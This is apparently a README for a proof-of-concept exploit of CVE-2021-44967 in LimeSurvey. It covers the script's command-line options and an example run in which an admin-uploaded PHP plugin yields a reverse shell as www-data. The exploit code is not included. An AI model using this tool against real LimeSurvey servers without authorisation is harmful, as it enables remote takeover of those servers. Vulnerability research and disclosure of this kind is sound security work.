POC for CVE-2021-44967: LimeSurvey RCE# CVE-2021-44967: LimeSurvey RCE
## Description
This Proof-of-Concept (POC) can be used to exploit CVE-2021-44967 to upload and execute a malicious LimeSurvey PHP plugin as administrator to obtain a reverse shell.
A Remote Code Execution (RCE) vulnerabilty exists in LimeSurvey 5.2.4 via the upload and install plugins function, which could let a remote malicious user upload an arbitrary PHP code file.
Severity: 8.3 HIGH Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
## Usage
```text
usage: limesurvey_rce.py [-h] -t URL -u USERNAME -p PASSWORD [-f FILE] [--listen-ip LISTEN_IP] [--listen-port LISTEN_PORT] [--threads THREADS] [--sleep-time SLEEP_TIME] [--row ROW]
[--length LENGTH] [-a USERAGENT] [-x PROXY] [-v]
POC for CVE-2021-44967 (LimeSurvey RCE)
options:
-h, --help show this help message and exit
-t, --url URL LimeSurvey Target URL
-u, --username USERNAME
LimeSurvey username
-p, --password PASSWORD
LimeSurvey password
-f, --file FILE Custom PHP payload file
--listen-ip LISTEN_IP
Listening IP / Interface
--listen-port LISTEN_PORT
Listening Port
-a, --useragent USERAGENT
User agent to use when sending requests
-x, --proxy PROXY HTTP(s) proxy to use when sending requests (i.e. -p http://127.0.0.1:8080)
-v, --verbose Verbosity enabled - additional output flag
```
## Example
```sh
python3 limesurvey_rce.py -t https://TARGET/ -u 'USERNAME' -p 'PASSWORD'
[*] Authenticating ...
[+] Login successful!
[*] Uploading plugin ...
[*] Activating plugin ...
[*] Starting listener and sending reverse shelll ...
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from X.X.X.X:51004.
www-data@target:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Tested on LimeSurvey Community Edition Version 6.6.4.
## References
- [CVE-2021-44967](https://nvd.nist.gov/vuln/detail/CVE-2021-44967)
- [Original POC](https://github.com/Y1LD1R1M-1337/Limesurvey-RCE)
[4.0K] /data/pocs/4622b2c3398e4d08ad31245f968c7e9e1782b67c
├── [6.8K] limesurvey_rce.py
└── [2.0K] README.md
0 directories, 2 files